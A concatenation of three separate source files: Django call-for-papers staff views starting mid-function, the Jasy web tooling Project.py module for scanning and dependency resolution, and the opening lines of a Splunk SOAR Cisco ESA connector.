writer = csv.writer(response)
for talk in talks:
writer.writerow(talk.get_csv_row())
return response
# Action
action_form = TalkActionForm(request.POST or None, talks=talks, site=request.conference.site)
if request.method == 'POST' and action_form.is_valid():
data = action_form.cleaned_data
for talk_id in data['talks']:
talk = Talk.objects.get(site=request.conference.site, pk=talk_id)
if data['decision'] != None and data['decision'] != talk.accepted:
if data['decision']:
action = _('accepted')
else:
action = _('declined')
note = _('The talk has been %(action)s.') % {'action': action}
send_message(
thread=talk.conversation,
author=request.user,
subject=_("[%(conference)s] The talk '%(talk)s' have been %(action)s") % {
'conference': request.conference,
'talk': talk,
'action': action,
},
content=note,
)
talk.accepted = data['decision']
if data['track']:
talk.track = Track.objects.get(site=request.conference.site, slug=data['track'])
if data['tag']:
talk.tags.add(Tag.objects.get(site=request.conference.site, slug=data['tag']))
if data['room']:
talk.room = Room.objects.get(site=request.conference.site, slug=data['room'])
talk.save()
if data['email']:
email = int(data['email'])
if email == TalkActionForm.EMAIL_TALKS:
request.session['talk-email-list'] = data['talks']
return redirect(reverse('talk-email'))
elif email == TalkActionForm.EMAIL_SPEAKERS:
selected_talks = Talk.objects.filter(pk__in=data['talks'])
speakers = Participant.objects.filter(pk__in=selected_talks.values('speakers__pk')).distinct()
request.session['speaker-email-list'] = list(speakers.values_list('pk', flat=True))
return redirect(reverse('speaker-email'))
return redirect(request.get_full_path())
# Sorting
if request.GET.get('order') == 'desc':
sort_reverse = True
else:
sort_reverse = False
SORT_MAPPING = {
'title': 'title',
'category': 'category',
'status': 'accepted',
}
sort = request.GET.get('sort')
if sort in SORT_MAPPING.keys():
if sort_reverse:
talks = talks.order_by('-' + SORT_MAPPING[sort])
else:
talks = talks.order_by(SORT_MAPPING[sort])
# Sorting URLs
sort_urls = dict()
sort_glyphicons = dict()
for c in SORT_MAPPING.keys():
url = request.GET.copy()
url['sort'] = c
if c == sort:
if sort_reverse:
del url['order']
glyphicon = 'sort-by-attributes-alt'
else:
url['order'] = 'desc'
glyphicon = 'sort-by-attributes'
else:
glyphicon = 'sort'
sort_urls[c] = url.urlencode()
sort_glyphicons[c] = glyphicon
csv_query_dict = request.GET.copy()
csv_query_dict['format'] = 'csv'
csv_link = '?' + csv_query_dict.urlencode()
return render(request, 'cfp/staff/talk_list.html', {
'show_filters': show_filters,
'talk_list': talks,
'filter_form': filter_form,
'action_form': action_form,
'sort_urls': sort_urls,
'sort_glyphicons': sort_glyphicons,
'csv_link': csv_link,
'pending_email': bool(request.session.get('talk-email-list', None)),
})
@staff_required
def talk_details(request, talk_id):
talk = get_object_or_404(Talk, pk=talk_id, site=request.conference.site)
try:
vote = talk.vote_set.get(user=request.user).vote
except Vote.DoesNotExist:
vote = None
message_form = MessageForm(request.POST or None)
if request.method == 'POST' and message_form.is_valid():
in_reply_to = talk.conversation.message_set.last()
subject=_("[%(conference)s] New comment about '%(talk)s'") % {
'conference': request.conference,
'talk': talk,
}
if in_reply_to:
# Maybe use in_reply_to.subject?
subject = 'Re: ' + subject
send_message(
thread=talk.conversation,
author=request.user,
subject=subject,
content=message_form.cleaned_data['content'],
in_reply_to=in_reply_to,
)
messages.success(request, _('Message sent!'))
return redirect(reverse('talk-details', args=[talk.pk]))
return render(request, 'cfp/staff/talk_details.html', {
'talk': talk,
'vote': vote,
})
@staff_required
def talk_vote(request, talk_id, score):
if score not in [-2, -1, 0, 1, 2]:
raise Http404
talk = get_object_or_404(Talk, pk=talk_id, site=request.conference.site)
vote, created = Vote.objects.get_or_create(talk=talk, user=request.user)
vote.vote = score
vote.save()
messages.success(request, _('Vote successfully created') if created else _('Vote successfully updated'))
return redirect(talk.get_absolute_url())
@staff_required
def talk_decide(request, talk_id, accept):
talk = get_object_or_404(Talk, pk=talk_id, site=request.conference.site)
if request.method == 'POST':
talk.accepted = accept
talk.save()
if accept:
action = _('accepted')
else:
action = _('declined')
# Does we need to send a notification to the proposer?
m = request.POST.get('message', '').strip()
if m:
for participant in talk.speakers.all():
send_message(
thread=participant.conversation,
author=request.conference,
subject=_("[%(conference)s] Your talk '%(talk)s' have been %(action)s") % {
'conference': request.conference,
'talk': talk,
'action': action,
},
content=m,
)
# Save the decision in the talk's conversation
send_message(
thread=talk.conversation,
author=request.user,
subject=_("[%(conference)s] The talk '%(talk)s' have been %(action)s") % {
'conference': request.conference,
'talk': talk,
'action': action,
},
content=_('The talk has been %(action)s.') % {'action': action},
)
messages.success(request, _('Decision taken in account'))
return redirect(talk.get_absolute_url())
return render(request, 'cfp/staff/talk_decide.html', {
'talk': talk,
'accept': accept,
})
@staff_required
def talk_email(request):
talks = Talk.objects.filter(pk__in=request.session.get('talk-email-list', []))
count = talks.annotate(speakers_count=Count('speakers', distinct=True)).aggregate(Sum('speakers_count'))['speakers_count__sum']
if not talks.exists():
messages.error(request, _('Please select some talks.'))
return redirect('talk-list')
form = SendTalkMailForm(request.POST or None, initial=request.session.get('talk-email-stored'), talks=talks)
if request.method == 'POST' and form.is_valid():
subject = form.cleaned_data['subject']
body = form.cleaned_data['body']
request.session['talk-email-stored'] = {'subject': subject, 'body': body}
if form.cleaned_data['confirm']:
sent = talk_email_send(talks, subject, body)
messages.success(request, _('%(count)d mails have been sent.') % {'count': sent})
del request.session['talk-email-list']
return redirect('talk-list')
else:
messages.info(request, _('Your ready to send %(count)d emails.') % {'count': count})
else:
form.fields.pop('confirm')
return render(request, 'cfp/staff/talk_email.html', {
'talks': talks,
'form': form,
})
@require_http_methods(['POST'])
@staff_required
def talk_email_preview(request):
form = PreviewTalkMailForm(request.POST or None)
if not form.is_valid():
return HttpResponseServerError()
speaker = get_object_or_404(Participant, site=request.conference.site, pk=form.cleaned_data['speaker'])
talk = get_object_or_404(Talk, site=request.conference.site, pk=form.cleaned_data['talk'])
preview = talk_email_render_preview(talk, speaker, form.cleaned_data['subject'], form.cleaned_data['body'])
return HttpResponse(preview)
@staff_required
def participant_list(request):
participants = Participant.objects.filter(site=request.conference.site) \
.extra(select={'lower_name': 'lower(name)'}) \
.order_by('lower_name')
# Filtering
show_filters = False
filter_form = ParticipantFilterForm(request.GET or None, site=request.conference.site)
if filter_form.is_valid():
data = filter_form.cleaned_data
talks = Talk.objects.filter(site=request.conference.site)
if len(data['category']):
show_filters = True
talks = talks.filter(reduce(lambda x, y: x | y, [Q(category__pk=pk) for pk in data['category']]))
if len(data['accepted']):
show_filters = True
talks = talks.filter(reduce(lambda x, y: x | y, [Q(accepted=dict(ACCEPTATION_VALUES)[status]) for status in data['accepted']]))
if len(data['confirmed']):
show_filters = True
talks = talks.filter(accepted=True)
talks = talks.filter(reduce(lambda x, y: x | y, [Q(confirmed=dict(CONFIRMATION_VALUES)[status]) for status in data['confirmed']]))
if len(data['track']):
show_filters = True
q = Q()
if 'none' in data['track']:
data['track'].remove('none')
q |= Q(track__isnull=True)
if len(data['track']):
q |= Q(track__slug__in=data['track'])
talks = talks.filter(q)
participants = participants.filter(talk__in=talks)
# Action
action_form = SpeakerActionForm(request.POST or None, speakers=participants)
if request.method == 'POST' and action_form.is_valid():
data = action_form.cleaned_data
if data['email']:
request.session['speaker-email-list'] = data['speakers']
return redirect(reverse('speaker-email'))
return redirect(request.get_full_path())
if request.GET.get('format') == 'csv':
response = HttpResponse(content_type='text/csv')
response['Content-Disposition'] = 'attachment; filename="participants.csv"'
writer = csv.writer(response)
for participant in participants:
writer.writerow(participant.get_csv_row())
return response
else:
contact_link = 'mailto:' + ','.join([participant.email for participant in participants.all()])
csv_query_dict = request.GET.copy()
csv_query_dict['format'] = 'csv'
csv_link = '?' + csv_query_dict.urlencode()
return render(request, 'cfp/staff/participant_list.html', {
'filter_form': filter_form,
'action_form': action_form,
'participant_list': participants,
'show_filters': show_filters,
'contact_link': contact_link,
'csv_link': csv_link,
'pending_email': bool(request.session.get('speaker-email-list', None)),
})
@staff_required
def participant_details(request, participant_id):
participant = get_object_or_404(Participant, pk=participant_id, site=request.conference.site)
message_form = MessageForm(request.POST or None)
if request.method == 'POST' and message_form.is_valid():
in_reply_to = participant.conversation.message_set.last()
send_message(
thread=participant.conversation,
author=request.user,
subject='',
content=message_form.cleaned_data['content'],
in_reply_to=in_reply_to,
)
messages.success(request, _('Message sent!'))
return redirect(reverse('participant-details', args=[participant.pk]))
return render(request, 'cfp/staff/participant_details.html', {
'participant': participant,
})
class ParticipantCreate(StaffRequiredMixin, OnSiteFormMixin, CreateView):
model = Participant
template_name = 'cfp/staff/participant_form.html'
def get_form_class(self):
return modelform_factory(
self.model,
form=ParticipantForm,
fields=['name', 'vip', 'email', 'phone_number', 'biography', 'notes'] + ParticipantForm.SOCIAL_FIELDS,
)
class ParticipantUpdate(StaffRequiredMixin, OnSiteFormMixin, UpdateView):
model = Participant
template_name = 'cfp/staff/participant_form.html'
slug_field = 'pk'
slug_url_kwarg = 'participant_id'
def get_form_class(self):
return modelform_factory(
self.model,
form=ParticipantForm,
fields=['name', 'vip', 'email', 'phone_number', 'biography', 'notes'] + ParticipantForm.SOCIAL_FIELDS,
)
class ParticipantRemove(StaffRequiredMixin, OnSiteFormMixin, DeleteView):
slug_field = 'pk'
slug_url_kwarg = 'participant_id'
success_url = reverse_lazy('participant-list')
def get_queryset(self):
return Participant.objects.filter(talk__isnull=True)
@staff_required
def participant_add_talk(request, participant_id):
participant = get_object_or_404(Participant, site=request.conference.site, pk=participant_id)
form = TalkForm(request.POST or None, categories=TalkCategory.objects.filter(site=request.conference.site))
if request.method == 'POST' and form.is_valid():
talk = form.save(commit=False)
talk.site = request.conference.site
talk.save()
talk.speakers.add(participant)
return redirect(reverse('talk-details', kwargs={'talk_id': talk.pk}))
return render(request, 'cfp/staff/talk_form.html', {
'form': form,
'participant': participant,
})
@staff_required
def speaker_email(request):
speakers = Participant.objects.filter(pk__in=request.session.get('speaker-email-list', []))
if not speakers.exists():
messages.error(request, _('Please select some speakers.'))
return redirect('participant-list')
form = SendSpeakerMailForm(request.POST or None, initial=request.session.get('speaker-email-stored'), speakers=speakers)
if request.method == 'POST' and form.is_valid():
subject = form.cleaned_data['subject']
body = form.cleaned_data['body']
request.session['speaker-email-stored'] = {'subject': subject, 'body': body}
if form.cleaned_data['confirm']:
sent = speaker_email_send(speakers, subject, body)
messages.success(request, _('%(count)d mails have been sent.') % {'count': sent})
del request.session['speaker-email-list']
return redirect('participant-list')
else:
messages.info(request, _('Your ready to send %(count)d emails.') % {'count': speakers.count()})
else:
form.fields.pop('confirm')
return render(request, 'cfp/staff/speaker_email.html', {
'speakers': speakers,
'form': form,
})
@require_http_methods(['POST'])
@staff_required
def speaker_email_preview(request):
form = PreviewSpeakerMailForm(request.POST or None)
if not form.is_valid():
return HttpResponseServerError()
speaker = get_object_or_404(Participant, site=request.conference.site, pk=form.cleaned_data['speaker'])
preview = speaker_email_render_preview(speaker, form.cleaned_data['subject'], form.cleaned_data['body'])
return HttpResponse(preview)
@staff_required
def conference_edit(request):
form = ConferenceForm(request.POST or None, instance=request.conference)
if request.method == 'POST' and form.is_valid():
old_staff = set(request.conference.staff.all())
new_conference = form.save()
new_staff = set(new_conference.staff.all())
added_staff = new_staff - old_staff
protocol = 'https' if request.is_secure() else 'http'
base_url = protocol+'://'+request.conference.site.domain
url_login = base_url + reverse('login')
url_password_reset = base_url + reverse('password_reset')
msg_title = _('[{}] You have been added to the staff team').format(request.conference.name)
msg_body_template = _("""Hi {},
You have been added to the staff team.
You can now:
- login: {}
- reset your password: {}
{}
""")
# TODO: send bulk emails
for user in added_staff:
msg_body = msg_body_template.format(user.get_full_name(), url_login, url_password_reset, request.conference.name)
send_mail(
msg_title,
msg_body,
request.conference.from_email(),
[user.email],
fail_silently=False,
)
messages.success(request, _('Modifications successfully saved.'))
return redirect(reverse('conference-edit'))
return render(request, 'cfp/admin/conference.html', {
'form': form,
})
@staff_required
def homepage_edit(request):
form = HomepageForm(request.POST or None, instance=request.conference)
if request.method == 'POST' and form.is_valid():
form.save()
messages.success(request, _('Modifications successfully saved.'))
return redirect(reverse('homepage-edit'))
return render(request, 'cfp/admin/homepage.html', {
'form': form,
})
class TalkUpdate(StaffRequiredMixin, OnSiteMixin, OnSiteFormMixin, UpdateView):
model = Talk
template_name = 'cfp/staff/talk_form.html'
pk_url_kwarg = 'talk_id'
def get_form_class(self):
return get_talk_speaker_form_class(self.object.site)
class TrackMixin(OnSiteMixin):
model = Track
class TrackList(StaffRequiredMixin, TrackMixin, ListView):
template_name = 'cfp/staff/track_list.html'
class TrackFormMixin(OnSiteFormMixin, TrackMixin):
template_name = 'cfp/staff/track_form.html'
form_class = TrackForm
success_url = reverse_lazy('track-list')
class TrackCreate(StaffRequiredMixin, TrackFormMixin, CreateView):
pass
class TrackUpdate(StaffRequiredMixin, TrackFormMixin, UpdateView):
pass
class RoomMixin(OnSiteMixin):
model = Room
class RoomList(StaffRequiredMixin, RoomMixin, ListView):
template_name = 'cfp/staff/room_list.html'
class RoomDetail(StaffRequiredMixin, RoomMixin, DetailView):
template_name = 'cfp/staff/room_details.html'
class RoomFormMixin(RoomMixin):
template_name = 'cfp/staff/room_form.html'
form_class = RoomForm
success_url = reverse_lazy('room-list')
def get_form_kwargs(self):
kwargs = super().get_form_kwargs()
kwargs.update({
'conference': self.request.conference,
})
return kwargs
class RoomCreate(StaffRequiredMixin, RoomFormMixin, CreateView):
pass
class RoomUpdate(StaffRequiredMixin, RoomFormMixin, UpdateView):
pass
class TalkCategoryMixin(OnSiteMixin):
model = TalkCategory
class TalkCategoryList(StaffRequiredMixin, TalkCategoryMixin, ListView):
template_name = 'cfp/admin/category_list.html'
class TalkCategoryFormMixin(TalkCategoryMixin):
template_name = 'cfp/admin/category_form.html'
form_class = TalkCategoryForm
success_url = reverse_lazy('category-list')
def get_form_kwargs(self):
kwargs = super().get_form_kwargs()
kwargs.update({
'conference': self.request.conference,
})
return kwargs
class TalkCategoryCreate(StaffRequiredMixin, TalkCategoryFormMixin, CreateView):
pass
class TalkCategoryUpdate(StaffRequiredMixin, TalkCategoryFormMixin, UpdateView):
pass
class TagMixin(OnSiteMixin):
model = Tag
class TagList(StaffRequiredMixin, TagMixin, ListView):
template_name = 'cfp/admin/tag_list.html'
class TagFormMixin(TagMixin):
template_name = 'cfp/admin/tag_form.html'
form_class = TagForm
success_url = reverse_lazy('tag-list')
def get_form_kwargs(self):
kwargs = super().get_form_kwargs()
kwargs.update({
'conference': self.request.conference,
})
return kwargs
class TagCreate(StaffRequiredMixin, TagFormMixin, CreateView):
pass
class TagUpdate(StaffRequiredMixin, TagFormMixin, UpdateView):
pass
class ActivityMixin(OnSiteMixin):
model = Activity
class ActivityList(StaffRequiredMixin, ActivityMixin, ListView):
template_name = 'cfp/admin/activity_list.html'
class ActivityFormMixin(ActivityMixin):
template_name = 'cfp/admin/activity_form.html'
form_class = ActivityForm
success_url = reverse_lazy('activity-list')
def get_form_kwargs(self):
kwargs = super().get_form_kwargs()
kwargs.update({
'conference': self.request.conference,
})
return kwargs
class ActivityCreate(StaffRequiredMixin, ActivityFormMixin, CreateView):
pass
class ActivityUpdate(StaffRequiredMixin, ActivityFormMixin, UpdateView):
pass
@staff_required
def create_user(request):
form = CreateUserForm(request.POST or None)
if request.method == 'POST' and form.is_valid():
form.save()
messages.success(request, _('User created successfully.'))
return redirect(reverse('create-user'))
return render(request, 'cfp/admin/create_user.html', {
'form': form,
})
def schedule(request, program_format, pending, template, staff, cache=None):
program = Program(site=request.conference.site, pending=pending, staff=staff, cache=cache)
if program_format is None:
return render(request, template, {'program': program.render('html')})
elif program_format == 'html':
return HttpResponse(program.render('html'))
elif program_format == 'xml':
return HttpResponse(program.render('xml'), content_type="application/xml")
elif program_format in ['ics', 'citymeo']:
response = HttpResponse(program.render('ics', citymeo=bool(program_format == 'citymeo')), content_type='text/calendar')
response['Content-Disposition'] = 'attachment; filename="planning.ics"'
return response
else:
raise Http404(_("Format '%s' not available" % program_format))
def public_schedule(request, program_format):
if not request.conference.schedule_available and not is_staff(request, request.user):
raise PermissionDenied
if request.conference.schedule_redirection_url and program_format is None:
return redirect(request.conference.schedule_redirection_url)
else:
return schedule(request, program_format=program_format, pending=False, template='cfp/schedule.html', staff=False)
@staff_required
def staff_schedule(request, program_format):
return schedule(request, program_format=program_format, pending=True, template='cfp/staff/schedule.html', staff=True, cache=False)
@staff_required
def schedule_evict(request):
cache.clear()
messages.success(request, _('Schedule evicted from cache.'))
return redirect('/')
class Select2View(StaffRequiredMixin, AutoResponseView):
pass
|
<filename>jasy/core/Project.py
#
# Jasy - Web Tooling Framework
# Copyright 2010-2012 Zynga Inc.
#
import os, re
import jasy.core.Cache
import jasy.core.Config as Config
import jasy.core.File as File
import jasy.core.Console as Console
import jasy.core.Util as Util
import jasy.vcs.Repository as Repository
import jasy.item.Abstract
import jasy.item.Doc
import jasy.item.Translation
import jasy.item.Class
import jasy.item.Asset
from jasy import UserError
__all__ = ["Project", "getProjectFromPath", "getProjectDependencies"]
classExtensions = (".js")
# Gettext .po files + ICU formats (http://userguide.icu-project.org/locale/localizing) (all formats but without .java support)
translationExtensions = (".po", ".xlf", ".properties", ".txt")
docFiles = ("package.md", "readme.md")
repositoryFolder = re.compile(r"^([a-zA-Z0-9\.\ _-]+)-([a-f0-9]{40})$")
projects = {}
def getProjectFromPath(path, config=None, version=None):
global projects
if not path in projects:
projects[path] = Project(path, config, version)
return projects[path]
def getProjectDependencies(project, checkoutDirectory="external", updateRepositories=True):
""" Returns a sorted list of projects depending on the given project (including the given one) """
def __resolve(project):
name = project.getName()
# List of required projects
Console.info("Getting requirements of %s...", Console.colorize(name, "bold"))
Console.indent()
requires = project.getRequires(checkoutDirectory, updateRepositories)
Console.outdent()
if not requires:
return
Console.debug("Processing %s requirements...", len(requires))
Console.indent()
# Adding all project in reverse order.
# Adding all local ones first before going down to their requirements
for requiredProject in reversed(requires):
requiredName = requiredProject.getName()
if not requiredName in names:
Console.debug("Adding: %s %s (via %s)", requiredName, requiredProject.version, project.getName())
names[requiredName] = True
result.append(requiredProject)
else:
Console.debug("Blocking: %s %s (via %s)", requiredName, requiredProject.version, project.getName())
# Process all requirements of added projects
for requiredProject in requires:
if requiredProject.hasRequires():
__resolve(requiredProject)
Console.outdent()
result = [project]
names = {
project.getName() : True
}
__resolve(project)
return result
def getProjectNameFromPath(path):
name = os.path.basename(path)
# Remove folder SHA1 postfix when cloned via git etc.
clone = repositoryFolder.match(name)
if clone is not None:
name = clone.group(1)
# Slashes are often used as a separator to optional data
if "-" in name:
name = name[:name.rindex("-")]
return name
class Project():
kind = "none"
scanned = False
def __init__(self, path, config=None, version=None):
"""
Constructor call of the project.
- First param is the path of the project relative to the current working directory.
- Config can be read from jasyproject.json or using constructor parameter @config
- Parent is used for structural debug messages (dependency trees)
"""
if not os.path.isdir(path):
raise UserError("Invalid project path: %s" % path)
# Only store and work with full path
self.__path = os.path.abspath(os.path.expanduser(path))
# Store given params
self.version = version
# Intialize item registries
self.classes = {}
self.assets = {}
self.docs = {}
self.translations = {}
# Load project configuration
self.__config = Config.Config(config)
self.__config.loadValues(os.path.join(self.__path, "jasyproject"), optional=True)
# Initialize cache
try:
File.mkdir(os.path.join(self.__path, ".jasy"))
self.__cache = jasy.core.Cache.Cache(self.__path, filename=".jasy/cache")
except IOError as err:
raise UserError("Could not initialize project. Cache file in %s could not be initialized! %s" % (self.__path, err))
# Detect version changes
if version is None:
self.__modified = True
else:
cachedVersion = self.__cache.read("project[version]")
self.__modified = cachedVersion != version
self.__cache.store("project[version]", version)
# Read name from manifest or use the basename of the project's path
self.__name = self.__config.get("name", getProjectNameFromPath(self.__path))
# Read requires
self.__requires = self.__config.get("requires", {})
# Defined whenever no package is defined and classes/assets are not stored in the toplevel structure.
self.__package = self.__config.get("package", self.__name if self.__config.has("name") else None)
# Read fields (for injecting data into the project and build permutations)
self.__fields = self.__config.get("fields", {})
# Read setup for running command pre-scan
self.__setup = self.__config.get("setup")
#
# Project Scan/Init
#
def scan(self):
if self.scanned:
return
updatemsg = "[updated]" if self.__modified else "[cached]"
Console.info("Scanning project %s %s...", self.__name, Console.colorize(updatemsg, "grey"))
Console.indent()
# Support for pre-initialize projects...
setup = self.__setup
if setup and self.__modified:
Console.info("Running setup...")
Console.indent()
for cmd in setup:
Console.info("Executing %s...", cmd)
result = None
try:
result = None
result = Util.executeCommand(cmd, "Failed to execute setup command %s" % cmd, path=self.__path)
except Exception as ex:
if result:
Console.error(result)
raise UserError("Could not scan project %s: %s" % (self.__name, ex))
Console.outdent()
# Processing custom content section. Only supports classes and assets.
if self.__config.has("content"):
self.kind = "manual"
self.__addContent(self.__config.get("content"))
# Application projects
elif self.__hasDir("source"):
self.kind = "application"
if self.__hasDir("source/class"):
self.__addDir("source/class", "classes")
if self.__hasDir("source/asset"):
self.__addDir("source/asset", "assets")
if self.__hasDir("source/translation"):
self.__addDir("source/translation", "translations")
# Compat - please change to class/style/asset instead
elif self.__hasDir("src"):
self.kind = "resource"
self.__addDir("src", "classes")
# Resource projects
else:
self.kind = "resource"
if self.__hasDir("class"):
self.__addDir("class", "classes")
if self.__hasDir("asset"):
self.__addDir("asset", "assets")
if self.__hasDir("translation"):
self.__addDir("translation", "translations")
# Generate summary
summary = []
for section in ["classes", "assets", "translations"]:
content = getattr(self, section, None)
if content:
summary.append("%s %s" % (len(content), section))
# Print out
if summary:
Console.info("Done %s: %s" % (Console.colorize("[%s]" % self.kind, "grey"), Console.colorize(", ".join(summary), "green")))
else:
Console.error("Project is empty!")
self.scanned = True
Console.outdent()
#
# FILE SYSTEM INDEXER
#
def __hasDir(self, directory):
full = os.path.join(self.__path, directory)
if os.path.exists(full):
if not os.path.isdir(full):
raise UserError("Expecting %s to be a directory: %s" % full)
return True
return False
def __addContent(self, content):
Console.debug("Adding manual content")
Console.indent()
for fileId in content:
fileContent = content[fileId]
if len(fileContent) == 0:
raise UserError("Empty content!")
# If the user defines a file extension for JS public idenfiers
# (which is not required) we filter them out
if fileId.endswith(".js"):
raise UserError("JavaScript files should define the exported name, not a file name: %s" % fileId)
fileExtension = os.path.splitext(fileContent[0])[1]
# Support for joining text content
if len(fileContent) == 1:
filePath = os.path.join(self.__path, fileContent[0])
else:
filePath = [os.path.join(self.__path, filePart) for filePart in fileContent]
# Structure files
if fileExtension in classExtensions:
construct = jasy.item.Class.ClassItem
dist = self.classes
elif fileExtension in translationExtensions:
construct = jasy.item.Translation.TranslationItem
dist = self.translations
else:
construct = jasy.item.Asset.AssetItem
dist = self.assets
# Check for duplication
if fileId in dist:
raise UserError("Item ID was registered before: %s" % fileId)
# Create instance
item = construct(self, fileId).attach(filePath)
Console.debug("Registering %s %s" % (item.kind, fileId))
dist[fileId] = item
Console.outdent()
def __addDir(self, directory, distname):
Console.debug("Scanning directory: %s" % directory)
Console.indent()
path = os.path.join(self.__path, directory)
if not os.path.exists(path):
return
for dirPath, dirNames, fileNames in os.walk(path):
for dirName in dirNames:
# Filter dotted directories like .git, .bzr, .hg, .svn, etc.
if dirName.startswith("."):
dirNames.remove(dirName)
# Filter sub projects
if os.path.exists(os.path.join(dirPath, dirName, "jasyproject.json")):
dirNames.remove(dirName)
relDirPath = os.path.relpath(dirPath, path)
for fileName in fileNames:
if fileName[0] == ".":
continue
relPath = os.path.normpath(os.path.join(relDirPath, fileName)).replace(os.sep, "/")
fullPath = os.path.join(dirPath, fileName)
self.addFile(relPath, fullPath, distname)
Console.outdent()
def addFile(self, relPath, fullPath, distname, override=False):
fileName = os.path.basename(relPath)
fileExtension = os.path.splitext(fileName)[1]
# Prepand package
if self.__package:
fileId = "%s/" % self.__package
else:
fileId = ""
# Structure files
if fileExtension in classExtensions and distname == "classes":
fileId += os.path.splitext(relPath)[0]
construct = jasy.item.Class.ClassItem
dist = self.classes
elif fileExtension in translationExtensions and distname == "translations":
fileId += os.path.splitext(relPath)[0]
construct = jasy.item.Translation.TranslationItem
dist = self.translations
elif fileName in docFiles:
fileId += os.path.dirname(relPath)
fileId = fileId.strip("/") # edge case when top level directory
construct = jasy.item.Doc.DocItem
dist = self.docs
else:
fileId += relPath
construct = jasy.item.Asset.AssetItem
dist = self.assets
# Only assets keep unix style paths identifiers
if construct != jasy.item.Asset.AssetItem:
fileId = fileId.replace("/", ".")
# Check for duplication
if fileId in dist and not override:
raise UserError("Item ID was registered before: %s" % fileId)
# Create instance
item = construct(self, fileId).attach(fullPath)
Console.debug("Registering %s %s" % (item.kind, fileId))
dist[fileId] = item
#
# ESSENTIALS
#
def hasRequires(self):
return len(self.__requires) > 0
def getRequires(self, checkoutDirectory="external", updateRepositories=True):
"""
Return the project requirements as project instances
"""
global projects
result = []
for entry in self.__requires:
if type(entry) is dict:
source = entry["source"]
config = Util.getKey(entry, "config")
version = Util.getKey(entry, "version")
kind = Util.getKey(entry, "kind")
else:
source = entry
config = None
version = None
kind = None
# Versions are expected being string type
if version is not None:
version = str(version)
revision = None
if Repository.isUrl(source):
kind = kind or Repository.getType(source)
path = os.path.abspath(os.path.join(checkoutDirectory, Repository.getTargetFolder(source, version)))
# Only clone and update when the folder is unique in this session
# This reduces git/hg/svn calls which are typically quite expensive
if not path in projects:
revision = Repository.update(source, version, path, updateRepositories)
if revision is None:
raise UserError("Could not update repository %s" % source)
else:
kind = "local"
if not source.startswith(("/", "~")):
path = os.path.join(self.__path, source)
else:
path = os.path.abspath(os.path.expanduser(source))
if path in projects:
project = projects[path]
else:
fullversion = []
# Produce user readable version when non is defined
if version is None and revision is not None:
version = "master"
if version is not None:
if "/" in version:
fullversion.append(version[version.rindex("/")+1:])
else:
fullversion.append(version)
if revision is not None:
# Shorten typical long revisions as used by e.g. Git
if type(revision) is str and len(revision) > 20:
fullversion.append(revision[:10])
else:
fullversion.append(revision)
if fullversion:
fullversion = "-".join(fullversion)
else:
fullversion = None
project = Project(path, config, fullversion)
projects[path] = project
result.append(project)
return result
def getFields(self):
""" Return the project defined fields which may be configured by the build script """
return self.__fields
def getClassByName(self, className):
""" Finds a class by its name."""
try:
return self.getClasses()[className]
except KeyError:
return None
def getName(self):
return self.__name
def getPath(self):
return self.__path
def getPackage(self):
return self.__package
def getConfigValue(self, key, default=None):
return self.__config.get(key, default)
def toRelativeUrl(self, path, prefix="", subpath="source"):
root = os.path.join(self.__path, subpath)
relpath = os.path.relpath(path, root)
if prefix:
if not prefix[-1] == os.sep:
prefix += os.sep
relpath = os.path.normpath(prefix + relpath)
return relpath.replace(os.sep, "/")
#
# CACHE API
#
def getCache(self):
"""Returns the cache instance"""
return self.__cache
def clean(self):
"""Clears the cache of the project"""
Console.info("Clearing cache of %s..." % self.__name)
self.__cache.clear()
def close(self):
"""Closes the project which deletes the internal caches"""
if self.__cache:
self.__cache.close()
self.__cache = None
self.classes = None
self.assets = None
self.docs = None
self.translations = None
def pause(self):
"""Pauses the project so that other processes could modify/access it"""
self.__cache.close()
def resume(self):
"""Resumes the paused project"""
self.__cache.open()
#
# LIST ACCESSORS
#
def getDocs(self):
"""Returns all package docs"""
if not self.scanned:
self.scan()
return self.docs
def getClasses(self):
""" Returns all project JavaScript classes. Requires all files to have a "js" extension. """
if not self.scanned:
self.scan()
return self.classes
def getAssets(self):
""" Returns all project asssets (images, stylesheets, static data, etc.). """
if not self.scanned:
self.scan()
return self.assets
def getTranslations(self):
""" Returns all translation objects """
if not self.scanned:
self.scan()
return self.translations
|
<reponame>splunk-soar-connectors/ciscoesa<gh_stars>0
# File: ciscoesa_connector.py
#
# Copyright (c) 2017-2022 Splunk Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software distributed under
# the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND,
# either express or implied. See the License for the specific language governing permissions
# and limitations under the License.
#
#
# Standard library imports
import base64
import datetime
import json
import re
import socket
import urllib
# Phantom imports
import phantom.app as phantom
import requests
from phantom.action_result import ActionResult
from phantom.base_connector import BaseConnector
# Local imports
import ciscoesa_consts as consts
# Dictionary that maps each error code with its corresponding message
ERROR_RESPONSE_DICT = {
consts.CISCOESA_REST_RESP_BAD_REQUEST: consts.CISCOESA_REST_RESP_BAD_REQUEST_MSG,
consts.CISCOESA_REST_RESP_UNAUTHORIZED: consts.CISCOESA_REST_RESP_UNAUTHORIZED_MSG,
consts.CISCOESA_REST_RESP_FORBIDDEN: consts.CISCOESA_REST_RESP_FORBIDDEN_MSG,
consts.CISCOESA_REST_RESP_NOT_FOUND: consts.CISCOESA_REST_RESP_NOT_FOUND_MSG,
consts.CISCOESA_REST_RESP_INTERNAL_SERVER_ERROR: consts.CISCOESA_REST_RESP_INTERNAL_SERVER_ERROR_MSG,
consts.CISCOESA_REST_RESP_NOT_ACCEPTABLE: consts.CISCOESA_REST_RESP_NOT_ACCEPTABLE_MSG,
consts.CISCOESA_REST_RESP_ENTITY_TOO_LARGE: consts.CISCOESA_REST_RESP_ENTITY_TOO_LARGE_MSG,
consts.CISCOESA_REST_RESP_URI_TOO_LONG: consts.CISCOESA_REST_RESP_URI_TOO_LONG_MSG,
consts.CISCOESA_REST_RESP_NOT_IMPLEMENTED: consts.CISCOESA_REST_RESP_NOT_IMPLEMENTED_MSG,
consts.CISCOESA_REST_RESP_BAD_GATEWAY: consts.CISCOESA_REST_RESP_BAD_GATEWAY_MSG
}
# Object that maps report title with its corresponding endpoint
# key: report title
# value: report endpoint
REPORT_TITLE_TO_NAME_AND_FILTER_MAPPING = {
consts.CISCOESA_MAIL_USER_DETAILS_REPORT_TITLE: consts.CISCOESA_MAIL_USER_DETAILS_REPORT_NAME,
